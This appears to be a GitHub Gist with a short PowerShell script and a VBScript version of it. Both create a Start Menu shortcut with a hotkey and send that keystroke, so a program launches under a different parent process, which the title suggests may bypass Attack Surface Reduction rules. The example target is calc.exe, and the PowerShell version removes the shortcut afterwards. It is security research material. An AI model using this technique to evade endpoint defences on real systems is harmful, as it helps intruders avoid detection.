Last active
May 29, 2020 14:49
-
-
Save monoxgas/58a2d4d4ef2dcb3cf5aad09579d1b9ba to your computer and use it in GitHub Desktop.
Execute something under svchost.exe using shortcut hotkeys (ASR bypass?)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$Shell = New-Object -Com WScript.Shell | |
$S = $Shell.CreateShortcut("$($Env:AppData)\Microsoft\Windows\Start Menu\default.lnk") | |
$S.TargetPath = "calc.exe" | |
$S.Hotkey = "Ctrl+U" | |
$S.Save() | |
$Shell.SendKeys("^u") | |
Start-Sleep 10;rm "$($Env:AppData)\Microsoft\Windows\Start Menu\default.lnk" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Set wsh = CreateObject("WScript.Shell") | |
appdata = wsh.SpecialFolders("AppData") | |
Set s = wsh.CreateShortcut(appdata + "\Microsoft\Windows\Start Menu\default.lnk") | |
s.TargetPath = "calc.exe" | |
s.Hotkey = "Ctrl+U" | |
s.Save | |
SendKeys ("^u") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment